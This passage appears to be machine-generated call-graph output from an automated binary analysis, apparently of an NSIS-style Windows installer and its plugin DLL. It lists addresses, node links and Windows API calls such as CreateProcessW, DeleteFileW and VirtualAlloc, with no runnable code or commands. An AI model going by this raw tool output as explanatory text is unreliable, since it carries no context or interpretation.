4331->4475 4492 406428 MoveFileExW 4331->4492 4496 405c4b CreateProcessW 4331->4496 4333->4331 4335 4069e7 wsprintfW LoadLibraryExW 4334->4335 4335->4249 4338 406a51 4337->4338 4339 406a5b GetProcAddress 4337->4339 4340 4069c5 3 API calls 4338->4340 4341 403750 4339->4341 4342 406a57 4340->4342 4341->4253 4342->4339 4342->4341 4343->4259 4344->4261 4346 405f6a 4345->4346 4347 4037e8 CharNextW 4346->4347 4348 405f71 CharNextW 4346->4348 4347->4272 4348->4346 4515 4068ef 4349->4515 4351 403625 4351->4267 4352 40361b 4352->4351 4524 405f37 lstrlenW CharPrevW 4352->4524 4355 405c16 2 API calls 4356 403633 4355->4356 4527 406187 4356->4527 4531 406158 GetFileAttributesW CreateFileW 4359->4531 4361 403113 4388 403120 4361->4388 4532 406668 lstrcpynW 4361->4532 4363 403136 4533 405f83 lstrlenW 4363->4533 4367 403147 GetFileSize 4368 40315e 4367->4368 4383 403241 4367->4383 4373 4032de 4368->4373 4381 40302e 32 API calls 4368->4381 4368->4383 4368->4388 4569 4035e2 4368->4569 4372 403286 GlobalAlloc 4374 40329d 4372->4374 4376 40302e 32 API calls 4373->4376 4378 406187 2 API calls 4374->4378 4376->4388 4377 403267 4379 4035e2 ReadFile 4377->4379 4380 4032ae CreateFileW 4378->4380 4382 403272 4379->4382 4384 4032e8 4380->4384 4380->4388 4381->4368 4382->4372 4382->4388 4538 40302e 4383->4538 4553 4035f8 SetFilePointer 4384->4553 4386 4032f6 4554 403371 4386->4554 4388->4274 4388->4388 4390 406a35 5 API calls 4389->4390 4391 403d2b 4390->4391 4392 403d31 4391->4392 4393 403d43 4391->4393 4631 4065af wsprintfW 4392->4631 4632 406536 4393->4632 4396 403d92 lstrcatW 4399 403d41 4396->4399 4398 406536 3 API calls 4398->4396 4616 403fed 4399->4616 4402 40603f 18 API calls 4403 403dc4 4402->4403 4404 403e58 4403->4404 4406 406536 3 API calls 4403->4406 4405 40603f 18 API calls 4404->4405 4407 403e5e 4405->4407 4411 403df6 4406->4411 4408 403e6e LoadImageW 4407->4408 4412 4066a5 17 API calls 4407->4412 4409 403f14 4408->4409 4410 403e95 RegisterClassW 4408->4410 4414 40140b 2 API calls 4409->4414 4413 403ecb SystemParametersInfoW CreateWindowExW 4410->4413 4444 403f1e 4410->4444 4411->4404 4415 403e17 lstrlenW 4411->4415 4419 405f64 CharNextW 4411->4419 4412->4408 4413->4409 4418 403f1a 4414->4418 4416 403e25 lstrcmpiW 4415->4416 4417 403e4b 4415->4417 4416->4417 4420 403e35 GetFileAttributesW 4416->4420 4421 405f37 3 API calls 4417->4421 4424 403fed 18 API calls 4418->4424 4418->4444 4422 403e14 4419->4422 4423 403e41 4420->4423 4425 403e51 4421->4425 4422->4415 4423->4417 4426 405f83 2 API calls 4423->4426 4427 403f2b 4424->4427 4637 406668 lstrcpynW 4425->4637 4426->4417 4429 403f37 ShowWindow 4427->4429 4430 403fba 4427->4430 4432 4069c5 3 API calls 4429->4432 4624 40579d OleInitialize 4430->4624 4434 403f4f 4432->4434 4433 403fc0 4435 403fc4 4433->4435 4436 403fdc 4433->4436 4437 403f5d GetClassInfoW 4434->4437 4439 4069c5 3 API calls 4434->4439 4443 40140b 2 API calls 4435->4443 4435->4444 4438 40140b 2 API calls 4436->4438 4440 403f71 GetClassInfoW RegisterClassW 4437->4440 4441 403f87 DialogBoxParamW 4437->4441 4438->4444 4439->4437 4440->4441 4442 40140b 2 API calls 4441->4442 4442->4444 4443->4444 4444->4278 4445->4265 4653 406668 lstrcpynW 4446->4653 4448 406050 4654 405fe2 CharNextW CharNextW 4448->4654 4451 403a27 4451->4278 4460 406668 lstrcpynW 4451->4460 4452 4068ef 5 API calls 4458 406066 4452->4458 4453 406097 lstrlenW 4454 4060a2 4453->4454 4453->4458 4455 405f37 3 API calls 4454->4455 4457 4060a7 GetFileAttributesW 4455->4457 4457->4451 4458->4451 4458->4453 4459 405f83 2 API calls 4458->4459 4660 40699e FindFirstFileW 4458->4660 4459->4453 4460->4313 4461->4280 4463 406a35 5 API calls 4462->4463 4464 403a61 lstrcatW 4463->4464 4464->4306 4464->4307 4466 403aa7 4465->4466 4467 405bea GetLastError 4465->4467 4466->4319 4467->4466 4468 405bf9 SetFileSecurityW 4467->4468 4468->4466 4469 405c0f GetLastError 4468->4469 4469->4466 4471 405c26 4470->4471 4472 405c2a GetLastError 4470->4472 4471->4319 4472->4471 4473->4321 4474->4331 4490 4066b2 4475->4490 4476 4068d5 4477 403b0d DeleteFileW 4476->4477 4665 406668 lstrcpynW 4476->4665 4477->4326 4477->4331 4479 4068a3 lstrlenW 4479->4490 4480 406536 3 API calls 4480->4490 4481 4066a5 10 API calls 4481->4479 4482 4067ba GetSystemDirectoryW 4482->4490 4485 4067cd GetWindowsDirectoryW 4485->4490 4486 4066a5 10 API calls 4486->4490 4487 406844 lstrcatW 4487->4490 4488 4068ef 5 API calls 4488->4490 4489 4067fc SHGetSpecialFolderLocation 4489->4490 4491 406814 SHGetPathFromIDListW CoTaskMemFree 4489->4491 4490->4476 4490->4479 4490->4480 4490->4481 4490->4482 4490->4485 4490->4486 4490->4487 4490->4488 4490->4489 4663 4065af wsprintfW 4490->4663 4664 406668 lstrcpynW 4490->4664 4491->4490 4493 40643c 4492->4493 4495 406449 4492->4495 4666 4062ae 4493->4666 4495->4331 4497 405c8a 4496->4497 4498 405c7e CloseHandle 4496->4498 4497->4331 4498->4497 4500 403c40 4499->4500 4501 403c36 CloseHandle 4499->4501 4502 403c54 4500->4502 4503 403c4a CloseHandle 4500->4503 4501->4500 4700 403c82 4502->4700 4503->4502 4509 405cdd 4508->4509 4510 403b89 ExitProcess 4509->4510 4511 405cf1 MessageBoxIndirectW 4509->4511 4511->4510 4513 401389 2 API calls 4512->4513 4514 401420 4513->4514 4514->4291 4518 4068fc 4515->4518 4516 406972 4517 406977 CharPrevW 4516->4517 4521 406998 4516->4521 4517->4516 4518->4516 4519 406965 CharNextW 4518->4519 4520 405f64 CharNextW 4518->4520 4522 406951 CharNextW 4518->4522 4523 406960 CharNextW 4518->4523 4519->4516 4519->4518 4520->4518 4521->4352 4522->4518 4523->4519 4525 405f53 lstrcatW 4524->4525 4526 40362d 4524->4526 4525->4526 4526->4355 4528 406194 GetTickCount GetTempFileNameW 4527->4528 4529 40363e 4528->4529 4530 4061ca 4528->4530 4529->4267 4530->4528 4530->4529 4531->4361 4532->4363 4534 405f91 4533->4534 4535 40313c 4534->4535 4536 405f97 CharPrevW 4534->4536 4537 406668 lstrcpynW 4535->4537 4536->4534 4536->4535 4537->4367 4539 403057 4538->4539 4540 40303f 4538->4540 4542 403067 GetTickCount 4539->4542 4543 40305f 4539->4543 4541 403048 DestroyWindow 4540->4541 4544 40304f 4540->4544 4541->4544 4542->4544 4546 403075 4542->4546 4573 406a71 4543->4573 4544->4372 4544->4388 4572 4035f8 SetFilePointer 4544->4572 4547 4030aa CreateDialogParamW ShowWindow 4546->4547 4548 40307d 4546->4548 4547->4544 4548->4544 4577 403012 4548->4577 4550 40308b wsprintfW 4580 4056ca 4550->4580 4553->4386 4555 403380 SetFilePointer 4554->4555 4556 40339c 4554->4556 4555->4556 4591 403479 GetTickCount 4556->4591 4559 403439 4559->4388 4562 403479 42 API calls 4563 4033d3 4562->4563 4563->4559 4564 40343f ReadFile 4563->4564 4566 4033e2 4563->4566 4564->4559 4566->4559 4567 4061db ReadFile 4566->4567 4606 40620a WriteFile 4566->4606 4567->4566 4570 4061db ReadFile 4569->4570 4571 4035f5 4570->4571 4571->4368 4572->4377 4574 406a8e PeekMessageW 4573->4574 4575 406a84 DispatchMessageW 4574->4575 4576 406a9e 4574->4576 4575->4574 4576->4544 4578 403021 4577->4578 4579 403023 MulDiv 4577->4579 4578->4579 4579->4550 4581 4056e5 4580->4581 4590 4030a8 4580->4590 4582 405701 lstrlenW 4581->4582 4583 4066a5 17 API calls 4581->4583 4584 40572a 4582->4584 4585 40570f lstrlenW 4582->4585 4583->4582 4587 405730 SetWindowTextW 4584->4587 4588 40573d 4584->4588 4586 405721 lstrcatW 4585->4586 4585->4590 4586->4584 4587->4588 4589 405743 SendMessageW SendMessageW SendMessageW 4588->4589 4588->4590 4589->4590 4590->4544 4592 4035d1 4591->4592 4593 4034a7 4591->4593 4595 40302e 32 API calls 4592->4595 4608 4035f8 SetFilePointer 4593->4608 4596 4033a3 4595->4596 4596->4559 4604 4061db ReadFile 4596->4604 4597 4034b2 SetFilePointer 4601 4034d7 4597->4601 4598 4035e2 ReadFile 4598->4601 4600 40302e 32 API calls 4600->4601 4601->4596 4601->4598 4601->4600 4602 40620a WriteFile 4601->4602 4603 4035b2 SetFilePointer 4601->4603 4609 406bb0 4601->4609 4602->4601 4603->4592 4605 4033bc 4604->4605 4605->4559 4605->4562 4607 406228 4606->4607 4607->4566 4608->4597 4610 406bd5 4609->4610 4611 406bdd 4609->4611 4610->4601 4611->4610 4612 406c64 GlobalFree 4611->4612 4613 406c6d GlobalAlloc 4611->4613 4614 406ce4 GlobalAlloc 4611->4614 4615 406cdb GlobalFree 4611->4615 4612->4613 4613->4610 4613->4611 4614->4610 4614->4611 4615->4614 4617 404001 4616->4617 4638 4065af wsprintfW 4617->4638 4619 404072 4639 4040a6 4619->4639 4621 403da2 4621->4402 4622 404077 4622->4621 4623 4066a5 17 API calls 4622->4623 4623->4622 4642 404610 4624->4642 4626 4057c0 4630 4057e7 4626->4630 4645 401389 4626->4645 4627 404610 SendMessageW 4628 4057f9 OleUninitialize 4627->4628 4628->4433 4630->4627 4631->4399 4649 4064d5 4632->4649 4635 403d73 4635->4396 4635->4398 4636 40656a RegQueryValueExW RegCloseKey 4636->4635 4637->4404 4638->4619 4640 4066a5 17 API calls 4639->4640 4641 4040b4 SetWindowTextW 4640->4641 4641->4622 4643 404628 4642->4643 4644 404619 SendMessageW 4642->4644 4643->4626 4644->4643 4647 401390 4645->4647 4646 4013fe 4646->4626 4647->4646 4648 4013cb MulDiv SendMessageW 4647->4648 4648->4647 4650 4064e4 4649->4650 4651 4064e8 4650->4651 4652 4064ed RegOpenKeyExW 4650->4652 4651->4635 4651->4636 4652->4651 4653->4448 4655 405fff 4654->4655 4659 406011 4654->4659 4657 40600c CharNextW 4655->4657 4655->4659 4656 406035 4656->4451 4656->4452 4657->4656 4658 405f64 CharNextW 4658->4659 4659->4656 4659->4658 4661 4069b4 FindClose 4660->4661 4662 4069bf 4660->4662 4661->4662 4662->4458 4663->4490 4664->4490 4665->4477 4667 406304 GetShortPathNameW 4666->4667 4668 4062de 4666->4668 4670 406423 4667->4670 4671 406319 4667->4671 4693 406158 GetFileAttributesW CreateFileW 4668->4693 4670->4495 4671->4670 4673 406321 wsprintfA 4671->4673 4672 4062e8 CloseHandle GetShortPathNameW 4672->4670 4674 4062fc 4672->4674 4675 4066a5 17 API calls 4673->4675 4674->4667 4674->4670 4676 406349 4675->4676 4694 406158 GetFileAttributesW CreateFileW 4676->4694 4678 406356 4678->4670 4679 406365 GetFileSize GlobalAlloc 4678->4679 4680 406387 4679->4680 4681 40641c CloseHandle 4679->4681 4682 4061db ReadFile 4680->4682 4681->4670 4683 40638f 4682->4683 4683->4681 4695 4060bd lstrlenA 4683->4695 4686 4063a6 lstrcpyA 4688 4063c8 4686->4688 4687 4063ba 4689 4060bd 4 API calls 4687->4689 4690 4063ff SetFilePointer 4688->4690 4689->4688 4691 40620a WriteFile 4690->4691 4692 406415 GlobalFree 4691->4692 4692->4681 4693->4672 4694->4678 4696 4060fe lstrlenA 4695->4696 4697 406106 4696->4697 4698 4060d7 lstrcmpiA 4696->4698 4697->4686 4697->4687 4698->4697 4699 4060f5 CharNextA 4698->4699 4699->4696 4701 403c90 4700->4701 4702 403c59 4701->4702 4703 403c95 FreeLibrary GlobalFree 4701->4703 4704 405d74 4702->4704 4703->4702 4703->4703 4705 40603f 18 API calls 4704->4705 4706 405d94 4705->4706 4707 405db3 4706->4707 4708 405d9c DeleteFileW 4706->4708 4710 405ede 4707->4710 4744 406668 lstrcpynW 4707->4744 4709 403b71 OleUninitialize 4708->4709 4709->4287 4709->4288 4710->4709 4715 40699e 2 API calls 4710->4715 4712 405dd9 4713 405dec 4712->4713 4714 405ddf lstrcatW 4712->4714 4717 405f83 2 API calls 4713->4717 4716 405df2 4714->4716 4720 405ef8 4715->4720 4718 405e02 lstrcatW 4716->4718 4719 405df8 4716->4719 4717->4716 4721 405e0d lstrlenW FindFirstFileW 4718->4721 4719->4718 4719->4721 4720->4709 4722 405efc 4720->4722 4723 405ed3 4721->4723 4735 405e2f 4721->4735 4724 405f37 3 API calls 4722->4724 4723->4710 4725 405f02 4724->4725 4727 405d2c 5 API calls 4725->4727 4726 405eb6 FindNextFileW 4730 405ecc FindClose 4726->4730 4726->4735 4729 405f0e 4727->4729 4731 405f12 4729->4731 4732 405f28 4729->4732 4730->4723 4731->4709 4736 4056ca 24 API calls 4731->4736 4733 4056ca 24 API calls 4732->4733 4733->4709 4735->4726 4737 405d74 60 API calls 4735->4737 4739 4056ca 24 API calls 4735->4739 4741 4056ca 24 API calls 4735->4741 4743 406428 36 API calls 4735->4743 4745 406668 lstrcpynW 4735->4745 4746 405d2c 4735->4746 4738 405f1f 4736->4738 4737->4735 4740 406428 36 API calls 4738->4740 4739->4726 4742 405f26 4740->4742 4741->4735 4742->4709 4743->4735 4744->4712 4745->4735 4754 406133 GetFileAttributesW 4746->4754 4749 405d47 RemoveDirectoryW 4752 405d55 4749->4752 4750 405d4f DeleteFileW 4750->4752 4751 405d59 4751->4735 4752->4751 4753 405d65 SetFileAttributesW 4752->4753 4753->4751 4755 405d38 4754->4755 4756 406145 SetFileAttributesW 4754->4756 4755->4749 4755->4750 4755->4751 4756->4755 4757 401941 4758 401943 4757->4758 4763 402da6 4758->4763 4761 405d74 67 API calls 4762 401951 4761->4762 4764 402db2 4763->4764 4765 4066a5 17 API calls 4764->4765 4766 402dd3 4765->4766 4767 401948 4766->4767 4768 4068ef 5 API calls 4766->4768 4767->4761 4768->4767 4769 4015c1 4770 402da6 17 API calls 4769->4770 4771 4015c8 4770->4771 4772 405fe2 4 API calls 4771->4772 4784 4015d1 4772->4784 4773 401631 4775 401663 4773->4775 4776 401636 4773->4776 4774 405f64 CharNextW 4774->4784 4778 401423 24 API calls 4775->4778 4788 401423 4776->4788 4785 40165b 4778->4785 4781 405c16 2 API calls 4781->4784 4782 405c33 5 API calls 4782->4784 4783 40164a SetCurrentDirectoryW 4783->4785 4784->4773 4784->4774 4784->4781 4784->4782 4786 401617 GetFileAttributesW 4784->4786 4787 405b99 4 API calls 4784->4787 4786->4784 4787->4784 4789 4056ca 24 API calls 4788->4789 4790 401431 4789->4790 4791 406668 lstrcpynW 4790->4791 4791->4783 4792 401c43 4814 402d84 4792->4814 4794 401c4a 4795 402d84 17 API calls 4794->4795 4796 401c57 4795->4796 4797 401c6c 4796->4797 4798 402da6 17 API calls 4796->4798 4799 401c7c 4797->4799 4800 402da6 17 API calls 4797->4800 4798->4797 4801 401cd3 4799->4801 4802 401c87 4799->4802 4800->4799 4803 402da6 17 API calls 4801->4803 4804 402d84 17 API calls 4802->4804 4806 401cd8 4803->4806 4805 401c8c 4804->4805 4807 402d84 17 API calls 4805->4807 4808 402da6 17 API calls 4806->4808 4809 401c98 4807->4809 4810 401ce1 FindWindowExW 4808->4810 4811 401cc3 SendMessageW 4809->4811 4812 401ca5 SendMessageTimeoutW 4809->4812 4813 401d03 4810->4813 4811->4813 4812->4813 4815 4066a5 17 API calls 4814->4815 4816 402d99 4815->4816 4816->4794 5397 4028c4 5398 4028ca 5397->5398 5399 4028d2 FindClose 5398->5399 5400 402c2a 5398->5400 5399->5400 4842 4040c5 4843 4040dd 4842->4843 4844 40423e 4842->4844 4843->4844 4847 4040e9 4843->4847 4845 40428f 4844->4845 4846 40424f GetDlgItem GetDlgItem 4844->4846 4849 4042e9 4845->4849 4861 401389 2 API calls 4845->4861 4915 4045c4 4846->4915 4850 4040f4 SetWindowPos 4847->4850 4851 404107 4847->4851 4855 404610 SendMessageW 4849->4855 4867 404239 4849->4867 4850->4851 4852 404110 ShowWindow 4851->4852 4853 404152 4851->4853 4856 404130 GetWindowLongW 4852->4856 4857 40422b 4852->4857 4858 404171 4853->4858 4859 40415a DestroyWindow 4853->4859 4854 404279 KiUserCallbackDispatcher 4860 40140b 2 API calls 4854->4860 4883 4042fb 4855->4883 4856->4857 4862 404149 ShowWindow 4856->4862 4924 40462b 4857->4924 4863 404176 SetWindowLongW 4858->4863 4864 404187 4858->4864 4914 40454d 4859->4914 4860->4845 4865 4042c1 4861->4865 4862->4853 4863->4867 4864->4857 4870 404193 GetDlgItem 4864->4870 4865->4849 4871 4042c5 SendMessageW 4865->4871 4868 40140b 2 API calls 4868->4883 4869 40454f DestroyWindow EndDialog 4869->4914 4873 4041c1 4870->4873 4874 4041a4 SendMessageW IsWindowEnabled 4870->4874 4871->4867 4872 40457e ShowWindow 4872->4867 4876 4041ce 4873->4876 4877 4041e1 4873->4877 4878 404215 SendMessageW 4873->4878 4887 4041c6 4873->4887 4874->4867 4874->4873 4875 4066a5 17 API calls 4875->4883 4876->4878 4876->4887 4880 4041e9 4877->4880 4881 4041fe 4877->4881 4878->4857 4884 40140b 2 API calls 4880->4884 4885 40140b 2 API calls 4881->4885 4882 4041fc 4882->4857 4883->4867 4883->4868 4883->4869 4883->4875 4886 4045c4 18 API calls 4883->4886 4889 4045c4 18 API calls 4883->4889 4905 40448f DestroyWindow 4883->4905 4884->4887 4888 404205 4885->4888 4886->4883 4921 40459d 4887->4921 4888->4857 4888->4887 4890 404376 GetDlgItem 4889->4890 4891 404393 ShowWindow KiUserCallbackDispatcher 4890->4891 4892 40438b 4890->4892 4918 4045e6 KiUserCallbackDispatcher 4891->4918 4892->4891 4894 4043bd EnableWindow 4899 4043d1 4894->4899 4895 4043d6 GetSystemMenu EnableMenuItem SendMessageW 4896 404406 SendMessageW 4895->4896 4895->4899 4896->4899 4898 4040a6 18 API calls 4898->4899 4899->4895 4899->4898 4919 4045f9 SendMessageW 4899->4919 4920 406668 lstrcpynW 4899->4920 4901 404435 lstrlenW 4902 4066a5 17 API calls 4901->4902 4903 40444b SetWindowTextW 4902->4903 4904 401389 2 API calls 4903->4904 4904->4883 4906 4044a9 CreateDialogParamW 4905->4906 4905->4914 4907 4044dc 4906->4907 4906->4914 4908 4045c4 18 API calls 4907->4908 4909 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4908->4909 4910 401389 2 API calls 4909->4910 4911 40452d 4910->4911 4911->4867 4912 404535 ShowWindow 4911->4912 4913 404610 SendMessageW 4912->4913 4913->4914 4914->4867 4914->4872 4916 4066a5 17 API calls 4915->4916 4917 4045cf SetDlgItemTextW 4916->4917 4917->4854 4918->4894 4919->4899 4920->4901 4922 4045a4 4921->4922 4923 4045aa SendMessageW 4921->4923 4922->4923 4923->4882 4925 4046ee 4924->4925 4926 404643 GetWindowLongW 4924->4926 4925->4867 4926->4925 4927 404658 4926->4927 4927->4925 4928 404685 GetSysColor 4927->4928 4929 404688 4927->4929 4928->4929 4930 404698 SetBkMode 4929->4930 4931 40468e SetTextColor 4929->4931 4932 4046b0 GetSysColor 4930->4932 4933 4046b6 4930->4933 4931->4930 4932->4933 4934 4046c7 4933->4934 4935 4046bd SetBkColor 4933->4935 4934->4925 4936 4046e1 CreateBrushIndirect 4934->4936 4937 4046da DeleteObject 4934->4937 4935->4934 4936->4925 4937->4936 5401 72492d43 5402 72492d5b 5401->5402 5403 7249162f 2 API calls 5402->5403 5404 72492d76 5403->5404 5408 4016cc 5409 402da6 17 API calls 5408->5409 5410 4016d2 GetFullPathNameW 5409->5410 5411 40170e 5410->5411 5412 4016ec 5410->5412 5413 401723 GetShortPathNameW 5411->5413 5414 402c2a 5411->5414 5412->5411 5415 40699e 2 API calls 5412->5415 5413->5414 5416 4016fe 5415->5416 5416->5411 5418 406668 lstrcpynW 5416->5418 5418->5411 5419 401e4e GetDC 5420 402d84 17 API calls 5419->5420 5421 401e60 GetDeviceCaps MulDiv ReleaseDC 5420->5421 5422 402d84 17 API calls 5421->5422 5423 401e91 5422->5423 5424 4066a5 17 API calls 5423->5424 5425 401ece CreateFontIndirectW 5424->5425 5426 402638 5425->5426 5427 402950 5428 402da6 17 API calls 5427->5428 5430 40295c 5428->5430 5429 402972 5432 406133 2 API calls 5429->5432 5430->5429 5431 402da6 17 API calls 5430->5431 5431->5429 5433 402978 5432->5433 5455 406158 GetFileAttributesW CreateFileW 5433->5455 5435 402985 5436 402a3b 5435->5436 5437 4029a0 GlobalAlloc 5435->5437 5438 402a23 5435->5438 5439 402a42 DeleteFileW 5436->5439 5440 402a55 5436->5440 5437->5438 5441 4029b9 5437->5441 5442 403371 44 API calls 5438->5442 5439->5440 5456 4035f8 SetFilePointer 5441->5456 5444 402a30 CloseHandle 5442->5444 5444->5436 5445 4029bf 5446 4035e2 ReadFile 5445->5446 5447 4029c8 GlobalAlloc 5446->5447 5448 4029d8 5447->5448 5449 402a0c 5447->5449 5450 403371 44 API calls 5448->5450 5451 40620a WriteFile 5449->5451 5454 4029e5 5450->5454 5452 402a18 GlobalFree 5451->5452 5452->5438 5453 402a03 GlobalFree 5453->5449 5454->5453 5455->5435 5456->5445 5457 72491058 5459 72491074 5457->5459 5458 724910dd 5459->5458 5461 72491092 5459->5461 5470 724915b6 5459->5470 5462 724915b6 GlobalFree 5461->5462 5463 724910a2 5462->5463 5464 724910a9 GlobalSize 5463->5464 5465 724910b2 5463->5465 5464->5465 5466 724910c7 5465->5466 5467 724910b6 GlobalAlloc 5465->5467 5469 724910d2 GlobalFree 5466->5469 5468 724915dd 3 API calls 5467->5468 5468->5466 5469->5458 5472 724915bc 5470->5472 5471 724915c2 5471->5461 5472->5471 5473 724915ce GlobalFree 5472->5473 5473->5461 5481 403cd5 5482 403ce0 5481->5482 5483 403ce4 5482->5483 5484 403ce7 GlobalAlloc 5482->5484 5484->5483 5485 401956 5486 402da6 17 API calls 5485->5486 5487 40195d lstrlenW 5486->5487 5488 402638 5487->5488 5152 4014d7 5153 402d84 17 API calls 5152->5153 5154 4014dd Sleep 5153->5154 5156 402c2a 5154->5156 5157 4020d8 5158 4020ea 5157->5158 5168 40219c 5157->5168 5159 402da6 17 API calls 5158->5159 5161 4020f1 5159->5161 5160 401423 24 API calls 5166 4022f6 5160->5166 5162 402da6 17 API calls 5161->5162 5163 4020fa 5162->5163 5164 402110 LoadLibraryExW 5163->5164 5165 402102 GetModuleHandleW 5163->5165 5167 402121 5164->5167 5164->5168 5165->5164 5165->5167 5180 406aa4 5167->5180 5168->5160 5171 402132 5174 402151 5171->5174 5175 40213a 5171->5175 5172 40216b 5173 4056ca 24 API calls 5172->5173 5176 402142 5173->5176 5185 72491817 5174->5185 5177 401423 24 API calls 5175->5177 5176->5166 5178 40218e FreeLibrary 5176->5178 5177->5176 5178->5166 5227 40668a WideCharToMultiByte 5180->5227 5182 406ac1 5183 406ac8 GetProcAddress 5182->5183 5184 40212c 5182->5184 5183->5184 5184->5171 5184->5172 5186 7249184a 5185->5186 5228 72491bff 5186->5228 5188 72491851 5189 72491976 5188->5189 5190 72491869 5188->5190 5191 72491862 5188->5191 5189->5176 5260 72492480 5190->5260 5274 7249243e 5191->5274 5196 724918cd 5202 7249191e 5196->5202 5203 724918d3 5196->5203 5197 724918af 5287 72492655 5197->5287 5198 72491898 5212 7249188e 5198->5212 5284 72492e23 5198->5284 5199 7249187f 5201 72491885 5199->5201 5207 72491890 5199->5207 5201->5212 5270 72492b98 5201->5270 5205 72492655 10 API calls 5202->5205 5306 72491666 5203->5306 5210 7249190f 5205->5210 5206 724918b5 5298 72491654 5206->5298 5278 72492810 5207->5278 5218 72491965 5210->5218 5312 72492618 5210->5312 5212->5196 5212->5197 5215 72492655 10 API calls 5215->5210 5217 72491896 5217->5212 5218->5189 5220 7249196f GlobalFree 5218->5220 5220->5189 5224 72491951 5224->5218 5316 724915dd wsprintfW 5224->5316 5225 7249194a FreeLibrary 5225->5224 5227->5182 5319 724912bb GlobalAlloc 5228->5319 5230 72491c26 5320 724912bb GlobalAlloc 5230->5320 5232 72491e6b GlobalFree GlobalFree GlobalFree 5233 72491e88 5232->5233 5245 72491ed2 5232->5245 5235 7249227e 5233->5235 5243 72491e9d 5233->5243 5233->5245 5234 72491d26 GlobalAlloc 5255 72491c31 5234->5255 5236 724922a0 GetModuleHandleW 5235->5236 5235->5245 5237 724922b1 LoadLibraryW 5236->5237 5238 724922c6 5236->5238 5237->5238 5237->5245 5327 724916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte 5238->5327 5239 72491d71 lstrcpyW 5242 72491d7b lstrcpyW 5239->5242 5240 72491d8f GlobalFree 5240->5255 5242->5255 5243->5245 5323 724912cc 5243->5323 5244 72492126 5326 724912bb GlobalAlloc 5244->5326 5245->5188 5247 72492325 lstrlenW 5252 724916bd 4 API calls 5247->5252 5249 72492067 GlobalFree 5249->5255 5250 724921ae 5250->5245 5258 72492216 lstrcpyW 5250->5258 5251 724922d8 5251->5245 5251->5247 5254 7249233f 5252->5254 5253 72491dcd 5253->5255 5321 7249162f GlobalSize GlobalAlloc 5253->5321 5254->5245 5255->5232 5255->5234 5255->5239 5255->5240 5255->5242 5255->5244 5255->5245 5255->5249 5255->5250 5255->5253 5256 724912cc 2 API calls 5255->5256 5256->5255 5258->5245 5259 7249212f 5259->5188 5267 72492498 5260->5267 5262 724925c1 GlobalFree 5263 7249186f 5262->5263 5262->5267 5263->5198 5263->5199 5263->5212 5264 7249256b GlobalAlloc CLSIDFromString 5264->5262 5265 72492540 GlobalAlloc 5268 72492569 5265->5268 5266 724912cc GlobalAlloc lstrcpynW 5266->5267 5267->5262 5267->5264 5267->5265 5267->5266 5267->5268 5330 7249135a 5267->5330 5268->5262 5334 724927a4 5268->5334 5272 72492baa 5270->5272 5271 72492c4f CreateFileA 5273 72492c6d 5271->5273 5272->5271 5273->5212 5275 72492453 5274->5275 5276 7249245e GlobalAlloc 5275->5276 5277 72491868 5275->5277 5276->5275 5277->5190 5282 72492840 5278->5282 5279 724928db GlobalAlloc 5283 724928fe 5279->5283 5280 724928ee 5281 724928f4 GlobalSize 5280->5281 5280->5283 5281->5283 5282->5279 5282->5280 5283->5217 5286 72492e2e 5284->5286 5285 72492e6e GlobalFree 5286->5285 5337 724912bb GlobalAlloc 5287->5337 5289 724926d8 MultiByteToWideChar 5294 7249265f 5289->5294 5290 7249270b lstrcpynW 5290->5294 5291 724926fa StringFromGUID2 5291->5294 5292 7249271e wsprintfW 5292->5294 5293 72492742 GlobalFree 5293->5294 5294->5289 5294->5290 5294->5291 5294->5292 5294->5293 5295 72492777 GlobalFree 5294->5295 5296 72491312 2 API calls 5294->5296 5338 72491381 5294->5338 5295->5206 5296->5294 5342 724912bb GlobalAlloc 5298->5342 5300 72491659 5301 72491666 2 API calls 5300->5301 5302 72491663 5301->5302 5303 72491312 5302->5303 5304 7249131b GlobalAlloc lstrcpynW 5303->5304 5305 72491355 GlobalFree 5303->5305 5304->5305 5305->5210 5307 72491672 wsprintfW 5306->5307 5308 7249169f lstrcpyW 5306->5308 5311 724916b8 5307->5311 5308->5311 5311->5215 5313 72491931 5312->5313 5314 72492626 5312->5314 5313->5224 5313->5225 5314->5313 5315 72492642 GlobalFree 5314->5315 5315->5314 5317 72491312 2 API calls 5316->5317 5318 724915fe 5317->5318 5318->5218 5319->5230 5320->5255 5322 7249164d 5321->5322 5322->5253 5329 724912bb GlobalAlloc 5323->5329 5325 724912db lstrcpynW 5325->5245 5326->5259 5328 724916fd GlobalFree 5327->5328 5328->5251 5329->5325 5331 72491361 5330->5331 5332 724912cc 2 API calls 5331->5332 5333 7249137f 5332->5333 5333->5267 5335 72492808 5334->5335 5336 724927b2 VirtualAlloc 5334->5336 5335->5268 5336->5335 5337->5294 5339 7249138a 5338->5339 5340 724913ac 5338->5340 5339->5340 5341 72491390 lstrcpyW 5339->5341 5340->5294 5341->5340 5342->5300 5489 402b59 5490 402b60 5489->5490 5491 402bab 5489->5491 5493 402ba9 5490->5493 5495 402d84 17 API calls 5490->5495 5492 406a35 5 API calls 5491->5492 5494 402bb2 5492->5494 5496 402da6 17 API calls 5494->5496 5497 402b6e 5495->5497 5498 402bbb 5496->5498 5499 402d84 17 API calls 5497->5499 5498->5493 5500 402bbf IIDFromString 5498->5500 5502 402b7a 5499->5502 5500->5493 5501 402bce 5500->5501 5501->5493 5507 406668 lstrcpynW 5501->5507 5506 4065af wsprintfW 5502->5506 5505 402beb CoTaskMemFree 5505->5493 5506->5493 5507->5505 5508 402a5b 5509 402d84 17 API calls 5508->5509 5510 402a61 5509->5510 5511 402aa4 5510->5511 5512 402a88 5510->5512 5517 40292e 5510->5517 5515 402abe 5511->5515 5516 402aae 5511->5516 5513 402a8d 5512->5513 5514 402a9e 5512->5514 5522 406668 lstrcpynW 5513->5522 5523 4065af wsprintfW 5514->5523 5518 4066a5 17 API calls 5515->5518 5519 402d84 17 API calls 5516->5519 5518->5517 5519->5517 5522->5517 5523->5517 5366 40175c 5367 402da6 17 API calls 5366->5367 5368 401763 5367->5368 5369 406187 2 API calls 5368->5369 5370 40176a 5369->5370 5371 406187 2 API calls 5370->5371 5371->5370 5524 401d5d 5525 402d84 17 API calls 5524->5525 5526 401d6e SetWindowLongW 5525->5526 5527 402c2a 5526->5527 5372 401ede 5373 402d84 17 API calls 5372->5373 5374 401ee4 5373->5374 5375 402d84 17 API calls 5374->5375 5376 401ef0 5375->5376 5377 401f07 EnableWindow 5376->5377 5378 401efc ShowWindow 5376->5378 5379 402c2a 5377->5379 5378->5379 5528 4028de 5529 